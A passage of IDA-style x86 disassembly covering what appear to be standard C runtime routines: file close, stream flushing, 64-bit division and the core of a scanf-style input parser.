loc_408ADC: ; CODE XREF: sub_408A4D+81�j
xor eax, eax
loc_408ADE: ; CODE XREF: sub_408A4D+8D�j
pop edi
pop esi
retn
sub_408A4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408AE1 proc near ; CODE XREF: sub_403451+48�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset dword_421578
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_408B10
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
loc_408B08: ; CODE XREF: sub_408AE1+5C�j
or eax, 0FFFFFFFFh
jmp loc_408B9E
; ---------------------------------------------------------------------------
loc_408B10: ; CODE XREF: sub_408AE1+12�j
xor edi, edi
cmp eax, edi
jl short loc_408B1E
cmp eax, ds:dword_433C84
jb short loc_408B3F
loc_408B1E: ; CODE XREF: sub_408AE1+33�j
; sub_408AE1+7C�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_408B08
; ---------------------------------------------------------------------------
loc_408B3F: ; CODE XREF: sub_408AE1+3B�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jz short loc_408B1E
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_408B80
push [ebp+arg_0]
call sub_408A4D
pop ecx
mov [ebp+var_1C], eax
jmp short loc_408B8F
; ---------------------------------------------------------------------------
loc_408B80: ; CODE XREF: sub_408AE1+8F�j
call sub_4057D3
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_408B8F: ; CODE XREF: sub_408AE1+9D�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_408BA4
mov eax, [ebp+var_1C]
loc_408B9E: ; CODE XREF: sub_408AE1+2A�j
call __SEH_epilog4
retn
sub_408AE1 endp
; =============== S U B R O U T I N E =======================================
sub_408BA4 proc near ; CODE XREF: sub_408AE1+B5�p
; DATA XREF: seg001:00421590�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_408BA4 endp
; =============== S U B R O U T I N E =======================================
sub_408BAE proc near ; CODE XREF: sub_403451+3C�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_408BD8
test al, 8
jz short loc_408BD8
push dword ptr [esi+8]
call sub_403603
and dword ptr [esi+0Ch], 0FFFFFBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_408BD8: ; CODE XREF: sub_408BAE+A�j
; sub_408BAE+E�j
pop esi
retn
sub_408BAE endp
; =============== S U B R O U T I N E =======================================
sub_408BDA proc near ; CODE XREF: sub_403451+34�p
; sub_4087B1+15�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
mov eax, [esi+0Ch]
mov ecx, eax
and cl, 3
xor ebx, ebx
cmp cl, 2
jnz short loc_408C2E
test ax, 108h
jz short loc_408C2E
mov eax, [esi+8]
push edi
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_408C2D
push edi
push eax
push esi
call sub_408A20
pop ecx
push eax
call sub_40D420
add esp, 0Ch
cmp eax, edi
jnz short loc_408C26
mov eax, [esi+0Ch]
test al, al
jns short loc_408C2D
and eax, 0FFFFFFFDh
mov [esi+0Ch], eax
jmp short loc_408C2D
; ---------------------------------------------------------------------------
loc_408C26: ; CODE XREF: sub_408BDA+3B�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_408C2D: ; CODE XREF: sub_408BDA+25�j
; sub_408BDA+42�j ...
pop edi
loc_408C2E: ; CODE XREF: sub_408BDA+13�j
; sub_408BDA+19�j
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop esi
mov eax, ebx
pop ebx
retn
sub_408BDA endp
; =============== S U B R O U T I N E =======================================
sub_408C3C proc near ; CODE XREF: sub_408C7E+69�p
; sub_408C7E+84�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_408C4E
push esi
call sub_408C7E
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_408C4E: ; CODE XREF: sub_408C3C+7�j
push esi
call sub_408BDA
test eax, eax
pop ecx
jz short loc_408C5E
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_408C5E: ; CODE XREF: sub_408C3C+1B�j
test word ptr [esi+0Ch], 4000h
jz short loc_408C7A
push esi
call sub_408A20
push eax
call sub_40F04F
pop ecx
pop ecx
neg eax
sbb eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_408C7A: ; CODE XREF: sub_408C3C+28�j
xor eax, eax
pop esi
retn
sub_408C3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408C7E proc near ; CODE XREF: sub_408C3C+A�p
; sub_408D58+2�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00408D31 SIZE 0000001E BYTES
push 14h
push offset dword_421598
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_24], edi
push 1
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
xor esi, esi
loc_408C9F: ; CODE XREF: sub_408C7E+9B�j
mov [ebp+var_20], esi
cmp esi, ds:dword_434DC0
jge loc_408D31
mov eax, ds:dword_433DA0
lea eax, [eax+esi*4]
cmp [eax], edi
jz short loc_408D18
mov eax, [eax]
test byte ptr [eax+0Ch], 83h
jz short loc_408D18
push eax
push esi
call sub_40818A
pop ecx
pop ecx
xor edx, edx
inc edx
mov [ebp+ms_exc.disabled], edx
mov eax, ds:dword_433DA0
mov eax, [eax+esi*4]
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_408D10
cmp [ebp+arg_0], edx
jnz short loc_408CF7
push eax
call sub_408C3C
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_408D10
inc [ebp+var_1C]
jmp short loc_408D10
; ---------------------------------------------------------------------------
loc_408CF7: ; CODE XREF: sub_408C7E+66�j
cmp [ebp+arg_0], edi
jnz short loc_408D10
test cl, 2
jz short loc_408D10
push eax
call sub_408C3C
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_408D10
or [ebp+var_24], eax
loc_408D10: ; CODE XREF: sub_408C7E+61�j
; sub_408C7E+72�j ...
mov [ebp+ms_exc.disabled], edi
call sub_408D20
loc_408D18: ; CODE XREF: sub_408C7E+3A�j
; sub_408C7E+42�j
inc esi
jmp short loc_408C9F
sub_408C7E endp
; =============== S U B R O U T I N E =======================================
sub_408D1B proc near ; DATA XREF: seg001:004215BC�o
xor edi, edi
mov esi, [ebp-20h]
sub_408D1B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_408D20 proc near ; CODE XREF: sub_408C7E+95�p
mov eax, ds:dword_433DA0
push dword ptr [eax+esi*4]
push esi
call sub_4081DC
pop ecx
pop ecx
retn
sub_408D20 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_408C7E
loc_408D31: ; CODE XREF: sub_408C7E+2A�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_408D4F
cmp [ebp+arg_0], 1
mov eax, [ebp+var_1C]
jz short loc_408D49
mov eax, [ebp+var_24]
loc_408D49: ; CODE XREF: sub_408C7E+C6�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_408C7E
; =============== S U B R O U T I N E =======================================
sub_408D4F proc near ; CODE XREF: sub_408C7E+BA�p
; DATA XREF: seg001:004215B0�o
push 1
call sub_40591F
pop ecx
retn
sub_408D4F endp
; =============== S U B R O U T I N E =======================================
sub_408D58 proc near ; CODE XREF: sub_40813B�p
push 1
call sub_408C7E
pop ecx
retn
sub_408D58 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408D70 proc near ; CODE XREF: sub_403540+29�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_408D92
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_408DD3
; ---------------------------------------------------------------------------
loc_408D92: ; CODE XREF: sub_408D70+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_408DA0: ; CODE XREF: sub_408D70+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_408DA0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_408DCE
cmp edx, [esp+8+arg_4]
ja short loc_408DCE
jb short loc_408DCF
cmp eax, [esp+8+arg_0]
jbe short loc_408DCF
loc_408DCE: ; CODE XREF: sub_408D70+4E�j
; sub_408D70+54�j
dec esi
loc_408DCF: ; CODE XREF: sub_408D70+56�j
; sub_408D70+5C�j
xor edx, edx
mov eax, esi
loc_408DD3: ; CODE XREF: sub_408D70+20�j
pop esi
pop ebx
retn 10h
sub_408D70 endp
; =============== S U B R O U T I N E =======================================
sub_408DD8 proc near ; CODE XREF: seg000:00409234�p
; seg000:004092AE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esi]
cmp [esp+arg_0], eax
jnz short loc_408E28
mov ecx, [edi]
cmp ecx, [esp+arg_4]
push 2
push eax
jnz short loc_408E17
call sub_40777A
test eax, eax
pop ecx
pop ecx
mov [edi], eax
jnz short loc_408DFB
loc_408DF8: ; CODE XREF: sub_408DD8+4A�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_408DFB: ; CODE XREF: sub_408DD8+1E�j
mov eax, [esp+arg_8]
mov dword ptr [eax], 1
push dword ptr [esi]
push [esp+4+arg_4]
push dword ptr [edi]
call sub_407BF0
add esp, 0Ch
jmp short loc_408E26
; ---------------------------------------------------------------------------
loc_408E17: ; CODE XREF: sub_408DD8+11�j
push ecx
call sub_40780D
add esp, 0Ch
test eax, eax
jz short loc_408DF8
mov [edi], eax
loc_408E26: ; CODE XREF: sub_408DD8+3D�j
shl dword ptr [esi], 1
loc_408E28: ; CODE XREF: sub_408DD8+6�j
xor eax, eax
inc eax
retn
sub_408DD8 endp
; =============== S U B R O U T I N E =======================================
sub_408E2C proc near ; CODE XREF: sub_408E42+7�p
; seg000:00409148�p ...
dec dword ptr [edx+4]
js short loc_408E3A
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_408E3A: ; CODE XREF: sub_408E2C+3�j
push edx
call sub_409C8D
pop ecx
retn
sub_408E2C endp
; =============== S U B R O U T I N E =======================================
sub_408E42 proc near ; CODE XREF: seg000:00408FB6�p
; seg000:0040913A�p
arg_0 = dword ptr 4
push ebx
loc_408E43: ; CODE XREF: sub_408E42+1F�j
mov edx, [esp+4+arg_0]
inc dword ptr [esi]
call sub_408E2C
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_408E63
movzx eax, bl
push eax
call sub_40F276
test eax, eax
pop ecx
jnz short loc_408E43
loc_408E63: ; CODE XREF: sub_408E42+11�j
mov eax, ebx
pop ebx
retn
sub_408E42 endp
; ---------------------------------------------------------------------------
push ebp
lea ebp, [esp-18Ch]
sub esp, 1FCh
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+188h], eax
mov eax, [ebp+1A0h]
push ebx
push esi
mov esi, [ebp+194h]
xor ebx, ebx
push edi
mov edi, [ebp+198h]
cmp edi, ebx
mov [ebp-58h], eax
lea eax, [ebp+8]
mov [ebp-14h], esi
mov [ebp-28h], edi
mov [ebp-24h], eax
mov dword ptr [ebp-4Ch], 15Eh
mov [ebp-44h], ebx
mov [ebp-5Ch], ebx
mov [ebp-4], ebx
jnz short loc_408EDC
loc_408EBC: ; CODE XREF: seg000:00408EDE�j
; seg000:00408F2D�j ...
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_409A9C
; ---------------------------------------------------------------------------
loc_408EDC: ; CODE XREF: seg000:00408EBA�j
cmp esi, ebx
jz short loc_408EBC
test byte ptr [esi+0Ch], 40h
jnz loc_408F7B
push esi
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_408F24
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_408F24
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_408F29
; ---------------------------------------------------------------------------
loc_408F24: ; CODE XREF: seg000:00408EF4�j
; seg000:00408F00�j
mov eax, offset dword_423BD0
loc_408F29: ; CODE XREF: seg000:00408F22�j
test byte ptr [eax+24h], 7Fh
jnz short loc_408EBC
push esi
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_408F69
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_408F69
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_408F6E
; ---------------------------------------------------------------------------
loc_408F69: ; CODE XREF: seg000:00408F39�j
; seg000:00408F45�j
mov eax, offset dword_423BD0
loc_408F6E: ; CODE XREF: seg000:00408F67�j
test byte ptr [eax+24h], 80h
jnz loc_408EBC
mov edi, [ebp-28h]
loc_408F7B: ; CODE XREF: seg000:00408EE4�j
push dword ptr [ebp+19Ch]
lea ecx, [ebp-6Ch]
call sub_40271F
mov al, [edi]
test al, al
mov [ebp-15h], bl
mov [ebp+4], ebx
mov [ebp-3Ch], ebx
jz loc_409A8C
mov edi, [ebp-28h]
loc_408F9F: ; CODE XREF: seg000:00409A29�j
movzx eax, al
push eax
call sub_40F276
test eax, eax
pop ecx
jz short loc_408FE0
push dword ptr [ebp-14h]
dec dword ptr [ebp+4]
lea esi, [ebp+4]
call sub_408E42
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_408FCC
push dword ptr [ebp-14h]
push eax
call sub_40F29F
pop ecx
pop ecx
loc_408FCC: ; CODE XREF: seg000:00408FBF�j
; seg000:00408FD9�j
inc edi
movzx eax, byte ptr [edi]
push eax
call sub_40F276
test eax, eax
pop ecx
jnz short loc_408FCC
jmp loc_409A25
; ---------------------------------------------------------------------------
loc_408FE0: ; CODE XREF: seg000:00408FAB�j
cmp byte ptr [edi], 25h
jnz loc_4099CD
xor eax, eax
mov [ebp-54h], eax
mov [ebp-3Dh], al
mov [ebp-1Ch], eax
mov [ebp-2Ch], eax
mov [ebp-0Ch], eax
mov [ebp-18h], al
mov [ebp-17h], al
mov [ebp-0Dh], al
mov [ebp+3], al
mov [ebp-16h], al
mov [ebp-5], al
mov byte ptr [ebp-0Eh], 1
mov [ebp-48h], eax
xor esi, esi
loc_409015: ; CODE XREF: seg000:004090E0�j
inc edi
movzx ebx, byte ptr [edi]
movzx eax, bl
push eax
call sub_40F17F
test eax, eax
pop ecx
jz short loc_40903C
mov eax, [ebp-0Ch]
inc dword ptr [ebp-2Ch]
imul eax, 0Ah
lea eax, [eax+ebx-30h]
mov [ebp-0Ch], eax
jmp loc_4090DC
; ---------------------------------------------------------------------------
loc_40903C: ; CODE XREF: seg000:00409025�j
cmp ebx, 4Eh
jg short loc_4090B2
jz loc_4090DC
cmp ebx, 2Ah
jz short loc_4090AD
cmp ebx, 46h
jz loc_4090DC
cmp ebx, 49h
jz short loc_409064
cmp ebx, 4Ch
jnz short loc_4090C1
inc byte ptr [ebp-0Eh]
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_409064: ; CODE XREF: seg000:00409058�j
mov cl, [edi+1]
cmp cl, 36h
jnz short loc_409081
lea eax, [edi+2]
cmp byte ptr [eax], 34h
jnz short loc_409081
loc_409074: ; CODE XREF: seg000:004090CC�j
inc dword ptr [ebp-48h]
mov edi, eax
mov [ebp-34h], esi
mov [ebp-30h], esi
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_409081: ; CODE XREF: seg000:0040906A�j
; seg000:00409072�j
cmp cl, 33h
jnz short loc_409092
lea eax, [edi+2]
cmp byte ptr [eax], 32h
jnz short loc_409092
mov edi, eax
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_409092: ; CODE XREF: seg000:00409084�j
; seg000:0040908C�j
cmp cl, 64h
jz short loc_4090DC
cmp cl, 69h
jz short loc_4090DC
cmp cl, 6Fh
jz short loc_4090DC
cmp cl, 78h
jz short loc_4090DC
cmp cl, 58h
jnz short loc_4090C1
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_4090AD: ; CODE XREF: seg000:0040904A�j
inc byte ptr [ebp-0Dh]
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_4090B2: ; CODE XREF: seg000:0040903F�j
cmp ebx, 68h
jz short loc_4090D6
cmp ebx, 6Ch
jz short loc_4090C6
cmp ebx, 77h
jz short loc_4090D1
loc_4090C1: ; CODE XREF: seg000:0040905D�j
; seg000:004090A9�j
inc byte ptr [ebp+3]
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_4090C6: ; CODE XREF: seg000:004090BA�j
lea eax, [edi+1]
cmp byte ptr [eax], 6Ch
jz short loc_409074
inc byte ptr [ebp-0Eh]
loc_4090D1: ; CODE XREF: seg000:004090BF�j
inc byte ptr [ebp-5]
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_4090D6: ; CODE XREF: seg000:004090B5�j
dec byte ptr [ebp-0Eh]
dec byte ptr [ebp-5]
loc_4090DC: ; CODE XREF: seg000:00409037�j
; seg000:00409041�j ...
cmp byte ptr [ebp+3], 0
jz loc_409015
cmp byte ptr [ebp-0Dh], 0
mov [ebp-28h], edi
jnz short loc_4090FD
mov eax, [ebp-58h]
mov esi, [eax]
mov [ebp-70h], eax
add eax, 4
mov [ebp-58h], eax
loc_4090FD: ; CODE XREF: seg000:004090ED�j
cmp byte ptr [ebp-5], 0
mov [ebp-38h], esi
mov byte ptr [ebp+3], 0
jnz short loc_40911C
mov al, [edi]
cmp al, 53h
jz short loc_409118
cmp al, 43h
mov byte ptr [ebp-5], 0FFh
jnz short loc_40911C
loc_409118: ; CODE XREF: seg000:0040910E�j
mov byte ptr [ebp-5], 1
loc_40911C: ; CODE XREF: seg000:00409108�j
; seg000:00409116�j
movzx ebx, byte ptr [edi]
or ebx, 20h
cmp ebx, 6Eh
mov [ebp-20h], ebx
jz short loc_40915F
cmp ebx, 63h
jz short loc_409142
cmp ebx, 7Bh
jz short loc_409142
push dword ptr [ebp-14h]
lea esi, [ebp+4]
call sub_408E42
pop ecx
jmp short loc_40914D
; ---------------------------------------------------------------------------
loc_409142: ; CODE XREF: seg000:0040912D�j
; seg000:00409132�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
loc_40914D: ; CODE XREF: seg000:00409140�j
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jz loc_409A59
mov esi, [ebp-38h]
mov edi, [ebp-28h]
loc_40915F: ; CODE XREF: seg000:00409128�j
mov ecx, [ebp-2Ch]
test ecx, ecx
jz short loc_409170
cmp dword ptr [ebp-0Ch], 0
jz loc_409A31
loc_409170: ; CODE XREF: seg000:00409164�j
cmp ebx, 6Fh
jg loc_40957C
jz loc_4097A7
cmp ebx, 63h
jz loc_40946E
push 64h
pop eax
cmp ebx, eax
jz loc_4097A7
jle loc_4095A6
cmp ebx, 67h
jle short loc_4091D6
cmp ebx, 69h
jz short loc_4091BE
cmp ebx, 6Eh
jnz loc_4095A6
cmp byte ptr [ebp-0Dh], 0
mov edi, [ebp+4]
jz loc_4099A1
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_4091BE: ; CODE XREF: seg000:004091A1�j
mov [ebp-20h], eax
loc_4091C1: ; CODE XREF: seg000:0040959B�j
mov ebx, [ebp-4]
cmp ebx, 2Dh
jnz loc_40968F
mov byte ptr [ebp-17h], 1
jmp loc_409694
; ---------------------------------------------------------------------------
loc_4091D6: ; CODE XREF: seg000:0040919C�j
xor ebx, ebx
cmp dword ptr [ebp-4], 2Dh
jnz short loc_4091E7
mov eax, [ebp-24h]
mov byte ptr [eax], 2Dh
inc ebx
jmp short loc_4091ED
; ---------------------------------------------------------------------------
loc_4091E7: ; CODE XREF: seg000:004091DC�j
cmp dword ptr [ebp-4], 2Bh
jnz short loc_4091FE
loc_4091ED: ; CODE XREF: seg000:004091E5�j
dec dword ptr [ebp-0Ch]
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov [ebp-4], eax
loc_4091FE: ; CODE XREF: seg000:004091EB�j
cmp dword ptr [ebp-2Ch], 0
jnz short loc_409208
or dword ptr [ebp-0Ch], 0FFFFFFFFh
loc_409208: ; CODE XREF: seg000:00409202�j
movzx eax, byte ptr [ebp-4]
jmp short loc_409255
; ---------------------------------------------------------------------------
loc_40920E: ; CODE XREF: seg000:0040925E�j
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jz short loc_409260
mov al, [ebp-4]
mov ecx, [ebp-24h]
inc dword ptr [ebp-1Ch]
mov [ebx+ecx], al
lea eax, [ebp-44h]
push eax
lea eax, [ebp+8]
push eax
inc ebx
push ebx
lea edi, [ebp-24h]
lea esi, [ebp-4Ch]
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov [ebp-4], eax
movzx eax, al
loc_409255: ; CODE XREF: seg000:0040920C�j
push eax
call sub_40F17F
test eax, eax
pop ecx
jnz short loc_40920E
loc_409260: ; CODE XREF: seg000:00409216�j
mov eax, [ebp-6Ch]
mov eax, [eax+0BCh]
mov eax, [eax]
mov al, [eax]
cmp al, [ebp-4]
mov [ebp-18h], al
jnz loc_409316
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jz loc_409316
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ecx, [ebp-24h]
mov [ebp-4], eax
mov al, [ebp-18h]
mov [ebx+ecx], al
lea eax, [ebp-44h]
push eax
lea eax, [ebp+8]
push eax
inc ebx
push ebx
lea edi, [ebp-24h]
lea esi, [ebp-4Ch]
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
movzx eax, byte ptr [ebp-4]
jmp short loc_40930B
; ---------------------------------------------------------------------------
loc_4092C4: ; CODE XREF: seg000:00409314�j
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jz short loc_409316
mov eax, [ebp-24h]
mov cl, [ebp-4]
inc dword ptr [ebp-1Ch]
mov [ebx+eax], cl
lea eax, [ebp-44h]
push eax
lea eax, [ebp+8]
push eax
inc ebx
push ebx
lea edi, [ebp-24h]
lea esi, [ebp-4Ch]
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov [ebp-4], eax
movzx eax, al
loc_40930B: ; CODE XREF: seg000:004092C2�j
push eax
call sub_40F17F
test eax, eax
pop ecx
jnz short loc_4092C4
loc_409316: ; CODE XREF: seg000:00409273�j
; seg000:00409281�j ...
cmp dword ptr [ebp-1Ch], 0
jz loc_409416
cmp dword ptr [ebp-4], 65h
jz short loc_409330
cmp dword ptr [ebp-4], 45h
jnz loc_409416
loc_409330: ; CODE XREF: seg000:00409324�j
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jz loc_409416
mov eax, [ebp-24h]
mov byte ptr [ebx+eax], 65h
lea eax, [ebp-44h]
push eax
lea eax, [ebp+8]
push eax
inc ebx
push ebx
lea edi, [ebp-24h]
lea esi, [ebp-4Ch]
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
cmp eax, 2Dh
mov [ebp-4], eax
jnz short loc_40939B
mov eax, [ebp-24h]
mov byte ptr [ebx+eax], 2Dh
lea eax, [ebp-44h]
push eax
lea eax, [ebp+8]
push eax
inc ebx
push ebx
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
jmp short loc_4093A1
; ---------------------------------------------------------------------------
loc_40939B: ; CODE XREF: seg000:00409376�j
cmp dword ptr [ebp-4], 2Bh
jnz short loc_4093BE
loc_4093A1: ; CODE XREF: seg000:00409399�j
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jnz short loc_4093B0
and [ebp-0Ch], eax
jmp short loc_4093BE
; ---------------------------------------------------------------------------
loc_4093B0: ; CODE XREF: seg000:004093A9�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov [ebp-4], eax
loc_4093BE: ; CODE XREF: seg000:0040939F�j
; seg000:004093AE�j
movzx eax, byte ptr [ebp-4]
jmp short loc_40940B
; ---------------------------------------------------------------------------
loc_4093C4: ; CODE XREF: seg000:00409414�j
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jz short loc_409416
mov eax, [ebp-24h]
mov cl, [ebp-4]
inc dword ptr [ebp-1Ch]
mov [ebx+eax], cl
lea eax, [ebp-44h]
push eax
lea eax, [ebp+8]
push eax
inc ebx
push ebx
lea edi, [ebp-24h]
lea esi, [ebp-4Ch]
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov [ebp-4], eax
movzx eax, al
loc_40940B: ; CODE XREF: seg000:004093C2�j
push eax
call sub_40F17F
test eax, eax
pop ecx
jnz short loc_4093C4
loc_409416: ; CODE XREF: seg000:0040931A�j
; seg000:0040932A�j ...
dec dword ptr [ebp+4]
cmp dword ptr [ebp-4], 0FFFFFFFFh
jz short loc_40942C
push dword ptr [ebp-14h]
push dword ptr [ebp-4]
call sub_40F29F
pop ecx
pop ecx
loc_40942C: ; CODE XREF: seg000:0040941D�j
cmp dword ptr [ebp-1Ch], 0
jz loc_409A59
cmp byte ptr [ebp-0Dh], 0
jnz loc_4099C1
mov eax, [ebp-24h]
inc dword ptr [ebp-3Ch]
lea ecx, [ebp-6Ch]
push ecx
push eax
push dword ptr [ebp-38h]
mov byte ptr [ebx+eax], 0
movsx eax, byte ptr [ebp-0Eh]
dec eax
push eax
push ds:off_423F9C
call sub_405193
pop ecx
call eax
add esp, 10h
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_40946E: ; CODE XREF: seg000:00409182�j
test ecx, ecx
jnz short loc_40947C
inc dword ptr [ebp-0Ch]
mov dword ptr [ebp-2Ch], 1
loc_40947C: ; CODE XREF: seg000:00409470�j
; seg000:0040958A�j
cmp byte ptr [ebp-5], 0
jle short loc_409486
mov byte ptr [ebp-16h], 1
loc_409486: ; CODE XREF: seg000:00409480�j
; seg000:0040968A�j
dec dword ptr [ebp+4]
cmp dword ptr [ebp-4], 0FFFFFFFFh
mov edi, esi
jz short loc_40949E
push dword ptr [ebp-14h]
push dword ptr [ebp-4]
call sub_40F29F
pop ecx
pop ecx
loc_40949E: ; CODE XREF: seg000:0040948F�j
; seg000:0040974D�j ...
cmp dword ptr [ebp-2Ch], 0
jz short loc_4094B2
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jz loc_40976B
loc_4094B2: ; CODE XREF: seg000:004094A2�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jz loc_409758
cmp ebx, 63h
jz short loc_409517
cmp ebx, 73h
jnz short loc_4094E6
cmp eax, 9
jl short loc_4094E1
cmp eax, 0Dh
jle loc_409758
loc_4094E1: ; CODE XREF: seg000:004094D6�j
cmp eax, 20h
jnz short loc_409517
loc_4094E6: ; CODE XREF: seg000:004094D1�j
cmp ebx, 7Bh
jnz loc_409758
movsx ebx, byte ptr [ebp-18h]
xor edx, edx
mov ecx, eax
and ecx, 7
inc edx
shl edx, cl
mov ecx, eax
sar ecx, 3
movsx ecx, byte ptr [ebp+ecx+168h]
xor ecx, ebx
test edx, ecx
mov ebx, [ebp-20h]
jz loc_409758
loc_409517: ; CODE XREF: seg000:004094CC�j
; seg000:004094E4�j
cmp byte ptr [ebp-0Dh], 0
jnz loc_409752
cmp byte ptr [ebp-16h], 0
jz loc_409747
mov [ebp-50h], al
movzx eax, al
push eax
call sub_40CA36
test eax, eax
pop ecx
jz short loc_40954A
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov [ebp-4Fh], al
loc_40954A: ; CODE XREF: seg000:0040953A�j
